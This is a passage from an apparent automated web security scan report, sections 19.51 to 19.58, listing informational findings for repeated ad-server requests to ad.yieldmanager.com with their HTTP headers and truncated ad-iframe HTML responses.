Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:19:55 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0388.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:19:55 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601187_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljN1qg0AQhZ.GO1n2x1-kF5qNYBttBdOiN6LuWkPUtatFm6fvUkNeoMMw853hzEHEs2sXmxjbreugyiWuhwhubGzVhgF16HkehtA0HYIg0ucoYD5FMPIPx8ZK.b-iLn3ZSU3q-KnY1Zvjg5UCYAgZr.vpK3b
...[SNIP]...
aNs.znNTuS5J6j.p90vVuWSSO-hkPVDCyyYnwDYuLjBhoxqGPVSjB1yhRK3ko-dxqhBtSwdRMjvzClLBO6Sje14ss4c7mUshqZGMrxe6i5LDsuuTL0olGOX97McuM=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601187_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317601187_HERE" border="0" alt="">
</a>
...[SNIP]...

19.51. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHd0gv9eXRCrfzkpgA5P8j5gotMdchY3NIk9mJAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D261681624%26r%3D0%26s%3D2126909,7c72be5e-ed56-11e0-a9f4-78e7d1623288,1317601653197 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:27:41 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0043.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:27:41 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601653_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTUFugzAQfA03ZNngEBDqwcRFog1JI6EgckFgm0IDmBqqUF5fp1T5QFer3ZnR7CyyfVbZhQersoS4YmzDfWRbbGtxDktuQt.3LceztsiF2DHHKOCEIhiRXcqcE.kt6tHXFelJXXKKVvbmEnCjAGCp4tsqfcY
...[SNIP]...
eEX-Mk-46XCB8fh-TJNOtpGgybGFaom4NJFVzMQA6inwGTnRaLSoGh1qZQiUqJsTZsiqFhOYvsRcM1czbozlmpcdOPQk25Knouu7z.6kqh8loooQ2tZNrxA7a6dNo=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601653_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601653_HERE" border="0" alt="">
</a>
...[SNIP]...

19.52. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnLkBtht7RCkX5FXii8NawCQH2MmvZt5xbq4QtAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D316372535%26r%3D0%26s%3D2126909,0e4bfcc8-ed52-11e0-a0a4-78e7d162d8bc,1317599750407 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:55:51 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0125.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:55:51 GMT
Pragma: no-cache
Content-Length: 1842
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599750_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGlTstqwzAQ.BrfjJBk1XExPUhVHdxEoQGT4lyCLSmV8UOO4pI0X19Rh.xAl2V3ZpgdFkWpxFDhWmJNIJQ6WaQownKBYFUfcQjTNCWQYIyiJELhOWeKcgRzylar05b-FX.mqxn5yRO6LWf2kVBw4QAQ68Rllk4
...[SNIP]...
Uk-0K1oih.9tw05f1Pf.8ShmaaxiCiAc58KzC5SukrsKMerkDa3ovV0YHReFPm9NHpswkiTmCA45sddKM8i58Q8lzWHjfDWbvp4KpB2f4wfPe1dgejnfaGzkrv-AX3E3NG,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599750_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599750_HERE" border="0" alt=""></a>
...[SNIP]...

19.53. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC3BwX1pebRCn9YKzdn4BkeZnsrcIs5FyeUJMrtAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1608542378%26r%3D0%26s%3D2126909,e57cad56-ed56-11e0-8c24-78e7d15f0cfc,1317601829423 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:05 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0061.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:31:05 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601829_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTl2LgzAQ.DW-SUjiZ5B7iM1Z5FSuYHvYF7ExnqXVeNFD8ddfOEv.QJdld2aYHRZZgdd4FhICQcRd0hA3QBbmngVFwx0TBkGAHGh7BHnEMcc4rClDMKa7d-4e6H8xwj42pCfz6UFu7NOnYGYA2FKl8yb9pD5
...[SNIP]...
3NT126z7ri8ae-fzPNdpoGw6IGjnTXYFJVLRYgB9EvgMtOi1WjwNBqU6REo8TYGhazoYHdVfbiWmvmOpBozi8aX.tRqKlUVV.Lrux.u4tQZSuU0Ia75NrxB4X7cuk=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601829_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317601829_HERE" border="0" alt="">
</a>
...[SNIP]...

19.54. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8xGO1lebRCgJvY9zXp10IPjocW-Oh.0gS6.ODAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1821794066%26r%3D0%26s%3D2126909,dc2c43b0-ed56-11e0-a95e-b3e2f14be636,1317601813797 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:01 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0192.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:31:01 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601813_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyMI2rwj1YIKoSOO0Sd2g5IJ4mEILmBoqEF9ft0T5ga5WuzOj2VmIPeRgVJbQwmaWWWXGPYhR7mCj4KmtG57nIezY0LY2WB8ivyABNCKyjXP7SP4q2ARPK1IzcMkxWtmLS8AUAGAKSadV-qK
...[SNIP]...
J2qq.sshxuOer-Qdercew1TDQUqi7AKNOCz0D0vJtBLlolpqUEfaVMoeSl5EOl4cA0NGQvouN1oZhtwV-eZwrX3cDlmMi0K0SbdN9txmVSccmVoRG5cvwAI8Vz1g==,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601813_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601813_HERE" border="0" alt="">
</a>
...[SNIP]...

19.55. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4w82H6uHRCo7JLLmhTqd5xXylM4QZmNQ1tg-tAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3251699019%26r%3D0%26s%3D2126909,13b5908c-ed54-11e0-8964-78e7d1f5c9f4,1317600618481 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:53 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0160.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:10:53 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317600618_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTV1rhDAQ.DW-SUjU-IH0IV4qSM9rBVuxL-Ilsd6dGhstJ.76prX4B7osuzPD7CyyQ-TVsEFMuMziAfJwiGyLeUi4jR2YMAxDK4AYew62fXNKIk4oggk5FMzNyG.RgD5tSE.qkyzZ2ItPwJ0C4EiV3jfpM.X
...[SNIP]...
e3tChRuXb9aT8kD6bZzvNo2MSwYt0czKrmYgFyFMMCmOy1WDcKjK02xUo0SkytYVMHGpa7ykFcuGYuRj-cnTW-DJNQc6Xqgcu-Gr76s1BVK5TQhk4y7fgGvNhzNg==,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600618_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317600618_HERE" border="0" alt="">
</a>
...[SNIP]...

19.56. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABFKuk3b-TRCoYiQ3Z94GxQp0oTcGO6v0chTWRoAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3412748720%26r%3D0%26s%3D2126909,9414ef6a-ed55-11e0-9670-78e7d16291b6,1317601263351 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:05 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0325.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:21:05 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601263_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljN1OhDAQhZ-GO9IUKD8N8QK2khAXdE1XIzcEShGWn2LBgPv0NrLZF3AymfnO5MwxLB.xukCOjUvmQtczmW9YJnNNl3k116Hv-wgaJkYIu1if47AKiAHj4PDInFPwVwSTp53UJF5wErt68QKwEgCQkMm6n74
...[SNIP]...
p1Cf34eaZRm95y1P-DrjfLMmlWoJmR6gossqj4BsTExw0wMahjUUswNcoUSV5LPjeaRRDUTOcqRt5WSjk2xEqzUnE7zlwuuSzGSgz5-D2UXOYNl1wZesGU4xdAmHPK,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601263_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317601263_HERE" border="0" alt="">
</a>
...[SNIP]...

19.57. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD7eo7vxuPRCsSRxUaSCAr5VGzfc4TqNMRl7oqsAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D2505440288%26r%3D0%26s%3D2126909,2f82aa06-ed55-11e0-b5f8-78e7d1f5c970,1317601094620 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:18 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0413.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:18:18 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601094_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljNlqwzAQRb.Gb0Zo84bpgxw14DRKG3Aa3JfgSHIdvCiVXRLy9RV18Q90GGbOHe5cRFKog0onca2SKKRnVKeIYBnhgFQR8WGappgmUQARjYk.5pliHMGcrZ5luGe.xRP-MpObPGZ7M6u3mIEbB4AaK27z6Uv
...[SNIP]...
rVimOJykdLxPLInny.maarR5iH164VmGyl9B2Yqx7uQJreHavagmvjTGura6vHxiOcQg-HDzPoi3IqDGDitDw7vgyjttPJVoMy.Wn47s.anhpttTN0RjrHD6KBcvc=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601094_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601094_HERE" border="0" alt="">
</a>
...[SNIP]...

19.58. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

